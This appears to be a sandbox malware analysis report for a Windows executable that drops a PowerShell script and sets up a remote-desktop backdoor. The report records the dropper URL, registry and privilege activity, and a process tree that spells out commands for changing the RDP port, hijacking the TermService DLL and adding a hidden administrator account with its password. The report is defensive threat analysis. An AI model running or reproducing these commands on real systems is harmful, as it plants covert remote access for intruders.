3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd

Analysis

max time kernel
58s
max time network
100s
platform
windows10_x64
resource
win10v20210408
submitted
11-06-2021 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20f307c716a689f4afa3a76b7143db22.exe
Size

6.0MB
MD5

20f307c716a689f4afa3a76b7143db22
SHA1

2fd6796fd158c93b14654240533511af6fec03e5
SHA256

3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
SHA512

0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
15	212	powershell.exe
17	212	powershell.exe
18	212	powershell.exe
19	212	powershell.exe
21	212	powershell.exe
23	212	powershell.exe
25	212	powershell.exe
27	212	powershell.exe
29	212	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

4012
4012

pid	process
4012
4012

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wgyjbpvf.l0f.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID317.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID328.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID269.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID2F6.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID327.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jag502fc.aqf.psm1	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1728 reg.exe
Runs net.exe

pid	process
1728	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3028	powershell.exe
3028	powershell.exe
3028	powershell.exe
1588	powershell.exe
1588	powershell.exe
1588	powershell.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe
2160	powershell.exe
2160	powershell.exe
2160	powershell.exe
3028	powershell.exe
3028	powershell.exe
3028	powershell.exe
212	powershell.exe
212	powershell.exe
212	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

636
636

pid	process
636
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeIncreaseQuotaPrivilege	1588	powershell.exe
Token: SeSecurityPrivilege	1588	powershell.exe
Token: SeTakeOwnershipPrivilege	1588	powershell.exe
Token: SeLoadDriverPrivilege	1588	powershell.exe
Token: SeSystemProfilePrivilege	1588	powershell.exe
Token: SeSystemtimePrivilege	1588	powershell.exe
Token: SeProfSingleProcessPrivilege	1588	powershell.exe
Token: SeIncBasePriorityPrivilege	1588	powershell.exe
Token: SeCreatePagefilePrivilege	1588	powershell.exe
Token: SeBackupPrivilege	1588	powershell.exe
Token: SeRestorePrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeSystemEnvironmentPrivilege	1588	powershell.exe
Token: SeRemoteShutdownPrivilege	1588	powershell.exe
Token: SeUndockPrivilege	1588	powershell.exe
Token: SeManageVolumePrivilege	1588	powershell.exe
Token: 33	1588	powershell.exe
Token: 34	1588	powershell.exe
Token: 35	1588	powershell.exe
Token: 36	1588	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeIncreaseQuotaPrivilege	1264	powershell.exe
Token: SeSecurityPrivilege	1264	powershell.exe
Token: SeTakeOwnershipPrivilege	1264	powershell.exe
Token: SeLoadDriverPrivilege	1264	powershell.exe
Token: SeSystemProfilePrivilege	1264	powershell.exe
Token: SeSystemtimePrivilege	1264	powershell.exe
Token: SeProfSingleProcessPrivilege	1264	powershell.exe
Token: SeIncBasePriorityPrivilege	1264	powershell.exe
Token: SeCreatePagefilePrivilege	1264	powershell.exe
Token: SeBackupPrivilege	1264	powershell.exe
Token: SeRestorePrivilege	1264	powershell.exe
Token: SeShutdownPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeSystemEnvironmentPrivilege	1264	powershell.exe
Token: SeRemoteShutdownPrivilege	1264	powershell.exe
Token: SeUndockPrivilege	1264	powershell.exe
Token: SeManageVolumePrivilege	1264	powershell.exe
Token: 33	1264	powershell.exe
Token: 34	1264	powershell.exe
Token: 35	1264	powershell.exe
Token: 36	1264	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeIncreaseQuotaPrivilege	2160	powershell.exe
Token: SeSecurityPrivilege	2160	powershell.exe
Token: SeTakeOwnershipPrivilege	2160	powershell.exe
Token: SeLoadDriverPrivilege	2160	powershell.exe
Token: SeSystemProfilePrivilege	2160	powershell.exe
Token: SeSystemtimePrivilege	2160	powershell.exe
Token: SeProfSingleProcessPrivilege	2160	powershell.exe
Token: SeIncBasePriorityPrivilege	2160	powershell.exe
Token: SeCreatePagefilePrivilege	2160	powershell.exe
Token: SeBackupPrivilege	2160	powershell.exe
Token: SeRestorePrivilege	2160	powershell.exe
Token: SeShutdownPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeSystemEnvironmentPrivilege	2160	powershell.exe
Token: SeRemoteShutdownPrivilege	2160	powershell.exe
Token: SeUndockPrivilege	2160	powershell.exe
Token: SeManageVolumePrivilege	2160	powershell.exe
Token: 33	2160	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

20f307c716a689f4afa3a76b7143db22.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 668 wrote to memory of 3028	668	20f307c716a689f4afa3a76b7143db22.exe	powershell.exe
PID 668 wrote to memory of 3028	668	20f307c716a689f4afa3a76b7143db22.exe	powershell.exe
PID 3028 wrote to memory of 3744	3028	powershell.exe	csc.exe
PID 3028 wrote to memory of 3744	3028	powershell.exe	csc.exe
PID 3744 wrote to memory of 2392	3744	csc.exe	cvtres.exe
PID 3744 wrote to memory of 2392	3744	csc.exe	cvtres.exe
PID 3028 wrote to memory of 1588	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 1588	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 1264	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 1264	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2160	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2160	3028	powershell.exe	powershell.exe
PID 3028 wrote to memory of 3724	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 3724	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 1728	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 1728	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 2364	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 2364	3028	powershell.exe	reg.exe
PID 3028 wrote to memory of 2228	3028	powershell.exe	net.exe
PID 3028 wrote to memory of 2228	3028	powershell.exe	net.exe
PID 2228 wrote to memory of 2236	2228	net.exe	net1.exe
PID 2228 wrote to memory of 2236	2228	net.exe	net1.exe
PID 3028 wrote to memory of 3892	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 3892	3028	powershell.exe	cmd.exe
PID 3892 wrote to memory of 512	3892	cmd.exe	cmd.exe
PID 3892 wrote to memory of 512	3892	cmd.exe	cmd.exe
PID 512 wrote to memory of 4020	512	cmd.exe	net.exe
PID 512 wrote to memory of 4020	512	cmd.exe	net.exe
PID 4020 wrote to memory of 2360	4020	net.exe	net1.exe
PID 4020 wrote to memory of 2360	4020	net.exe	net1.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	cmd.exe
PID 2016 wrote to memory of 2144	2016	cmd.exe	cmd.exe
PID 2016 wrote to memory of 2144	2016	cmd.exe	cmd.exe
PID 2144 wrote to memory of 1276	2144	cmd.exe	net.exe
PID 2144 wrote to memory of 1276	2144	cmd.exe	net.exe
PID 1276 wrote to memory of 2232	1276	net.exe	net1.exe
PID 1276 wrote to memory of 2232	1276	net.exe	net1.exe
PID 3744 wrote to memory of 3576	3744	cmd.exe	net.exe
PID 3744 wrote to memory of 3576	3744	cmd.exe	net.exe
PID 3576 wrote to memory of 1588	3576	net.exe	net1.exe
PID 3576 wrote to memory of 1588	3576	net.exe	net1.exe
PID 560 wrote to memory of 2088	560	cmd.exe	net.exe
PID 560 wrote to memory of 2088	560	cmd.exe	net.exe
PID 2088 wrote to memory of 2500	2088	net.exe	net1.exe
PID 2088 wrote to memory of 2500	2088	net.exe	net1.exe
PID 2792 wrote to memory of 3120	2792	cmd.exe	net.exe
PID 2792 wrote to memory of 3120	2792	cmd.exe	net.exe
PID 3120 wrote to memory of 188	3120	net.exe	net1.exe
PID 3120 wrote to memory of 188	3120	net.exe	net1.exe
PID 2768 wrote to memory of 4056	2768	cmd.exe	net.exe
PID 2768 wrote to memory of 4056	2768	cmd.exe	net.exe
PID 4056 wrote to memory of 3964	4056	net.exe	net1.exe
PID 4056 wrote to memory of 3964	4056	net.exe	net1.exe
PID 2308 wrote to memory of 1588	2308	cmd.exe	net.exe
PID 2308 wrote to memory of 1588	2308	cmd.exe	net.exe
PID 1588 wrote to memory of 656	1588	net.exe	net1.exe
PID 1588 wrote to memory of 656	1588	net.exe	net1.exe
PID 760 wrote to memory of 2504	760	cmd.exe	net.exe
PID 760 wrote to memory of 2504	760	cmd.exe	net.exe
PID 2504 wrote to memory of 1608	2504	net.exe	net1.exe
PID 2504 wrote to memory of 1608	2504	net.exe	net1.exe
PID 1232 wrote to memory of 2160	1232	cmd.exe	WMIC.exe
PID 1232 wrote to memory of 2160	1232	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe
"C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp" "c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP"
4⤵
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:3724

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:1728

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2364

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2236

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2360

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:2232

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:2164

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2172

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1588

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 9gM25Ibj /add
1⤵
- Suspicious use of WriteProcessMemory
PID:560

C:\Windows\system32\net.exe
net.exe user wgautilacc 9gM25Ibj /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 9gM25Ibj /add
3⤵
PID:2500

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:188

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2768

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
3⤵
PID:3964

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:656

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 9gM25Ibj
1⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\net.exe
net.exe user wgautilacc 9gM25Ibj
2⤵
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\system32\net1.exe
